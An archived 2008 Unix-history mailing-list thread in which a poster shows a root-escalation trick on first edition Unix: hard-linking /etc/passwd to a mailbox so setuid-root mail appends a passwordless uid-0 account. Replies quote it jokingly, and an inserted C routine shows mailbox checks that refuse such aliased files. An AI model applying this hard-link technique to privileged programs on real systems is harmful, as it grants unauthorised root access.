* [TUHS] Some fun with 1st ed
From: Tim Newsham @ 2008-05-03 19:20 UTC (permalink / raw)
All work and no play...

Here's a fun hack for first edition unix. From MAIL (I):

    When followed by the names of a letter and one or more people, the
    letter is appended to each person's mailbox. Each letter is
    preceded by the sender's name and a postmark.

    A person is either the name of an entry in the directory /usr, in
    which case the mail is sent to /usr/person/mailbox, or the path
    of a directory, in which case mailbox in that directory is used.

Mail is setuid root:

    # ls -l /bin/mail
    80 surwr- 1 root 3940 Jan 1 00:00:00 mail

Log in as a non-root user (ie "bin"), create a file "letter" with the
contents "hack::0:/:". Run:

    @ ln /etc/passwd /tmp/mailbox
    @ mail letter /tmp

Log out and log back in as "hack". You are now root. Cat /etc/passwd
and notice:

    From bin Jan 1 00:49:22
    hack::0:/:

Clean up the file a little and enjoy your new elevated status.

Tim Newsham
http://www.thenewsh.com/~newsham/
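
The message above turns on a setuid-root program appending to a "mailbox" that is really a second name for /etc/passwd. As an added example (not part of the original thread and not first edition Unix's mail source), this is how a privileged delivery agent on a modern POSIX system can refuse such a file; `open_mailbox`, `demo` and the scratch file names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open an existing mailbox for append, or return -1. The checks run on the
 * opened descriptor (fstat), so they describe the file that will be written. */
int open_mailbox(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW refuses a symlink at the path; O_NONBLOCK avoids hanging on a FIFO. */
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 ||
        !S_ISREG(st.st_mode) ||  /* no devices, FIFOs or directories */
        st.st_nlink != 1 ||      /* a second name means it may alias another file */
        st.st_uid != owner) {    /* link counts can change, so ownership must match too */
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario in a scratch directory: "passwd" stands in for a
 * sensitive file, "mailbox" is a hard link to it, "inbox" is an ordinary file.
 * Returns 0 when the hard link is refused and the ordinary file is accepted. */
int demo(void)
{
    char dir[] = "/tmp/mboxXXXXXX", a[64], b[64], c[64];
    int fd, rc = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(a, sizeof a, "%s/passwd", dir);
    snprintf(b, sizeof b, "%s/mailbox", dir);
    snprintf(c, sizeof c, "%s/inbox", dir);
    close(open(a, O_CREAT | O_WRONLY, 0600));
    close(open(c, O_CREAT | O_WRONLY, 0600));
    if (link(a, b) != 0) rc = -1;
    if ((fd = open_mailbox(b, geteuid())) >= 0) { rc |= 1; close(fd); } /* alias accepted */
    if ((fd = open_mailbox(c, geteuid())) < 0) rc |= 2; else close(fd); /* plain file refused */
    unlink(a); unlink(b); unlink(c); rmdir(dir);
    return rc;
}

int main(void) { return demo(); }
```

The `owner` argument is meant to be the recipient's uid, so a file owned by root is rejected even when its link count reads 1.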
* [TUHS] Some fun with 1st ed
From: Larry McVoy @ 2008-05-03 19:24 UTC (permalink / raw)
We need to send out a security alert immediately. This is serious.
On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> All work and no play...
>
> Here's a fun hack for first edition unix. From MAIL (I) :
>
> When followed by the names of a letter and one or more people, the
> letter is appended to each person's mailbox. Each letter is
> preceded by the sender's name and a postmark.
>
> A person is either the name of an entry in the directory /usr, in
> which case the mail is sent to /usr/person/mailbox, or the path
> of a directory, in which case mailbox in that directory is used.
>
> Mail is setuid root:
>
> # ls -l /bin/mail
> 80 surwr- 1 root 3940 Jan 1 00:00:00 mail
>
> login as a non-root user (ie "bin"), create a file "letter" with the
> contents "hack::0:/:". Run:
>
> @ ln /etc/passwd /tmp/mailbox
> @ mail letter /tmp
>
> log out and log back in as "hack". You are now root. Cat /etc/passwd
> and notice:
>
> From bin Jan 1 00:49:22
> hack::0:/:
>
> clean up the file a little and enjoy your new elevated status.
>
> Tim Newsham
> http://www.thenewsh.com/~newsham/
--
---
Larry McVoy lm at bitmover.com http://www.bitkeeper.com
* [TUHS] Some fun with 1st ed
From: Wilko Bulte @ 2008-05-03 19:29 UTC (permalink / raw)
Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
> We need to send out a security alert immediately. This is serious.
CERT to the rescue! Man the barricades !
;-)
> On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> > All work and no play...
> >
> > Here's a fun hack for first edition unix. From MAIL (I) :
> >
> > When followed by the names of a letter and one or more people, the
> > letter is appended to each person's mailbox. Each letter is
> > preceded by the sender's name and a postmark.
> >
> > A person is either the name of an entry in the directory /usr, in
> > which case the mail is sent to /usr/person/mailbox, or the path
> > of a directory, in which case mailbox in that directory is used.
> >
> > Mail is setuid root:
> >
> > # ls -l /bin/mail
> > 80 surwr- 1 root 3940 Jan 1 00:00:00 mail
> >
> > login as a non-root user (ie "bin"), create a file "letter" with the
> > contents "hack::0:/:". Run:
> >
> > @ ln /etc/passwd /tmp/mailbox
> > @ mail letter /tmp
> >
> > log out and log back in as "hack". You are now root. Cat /etc/passwd
> > and notice:
> >
> > From bin Jan 1 00:49:22
> > hack::0:/:
> >
> > clean up the file a little and enjoy your new elevated status.
> >
> > Tim Newsham
> > http://www.thenewsh.com/~newsham/
>
> --
> ---
> Larry McVoy lm at bitmover.com http://www.bitkeeper.com
--- end of quoted text ---
--
Wilko
* [TUHS] Some fun with 1st ed
From: Tim Newsham @ 2008-05-03 19:34 UTC (permalink / raw)
> Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
>> We need to send out a security alert immediately. This is serious.
>
> CERT to the rescue! Man the barricades !
I did this once with a 7th edition vuln. I think one is probably the
limit :)
http://www.securityfocus.com/archive/1/365038
>> Larry McVoy lm at bitmover.com http://www.bitkeeper.com
> Wilko
Tim Newsham
http://www.thenewsh.com/~newsham/
* [Unix-jun72] [TUHS] Some fun with 1st ed
From: Angus Robinson @ 2008-05-19 17:35 UTC (permalink / raw)
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20080519/5e492524/attachment.html>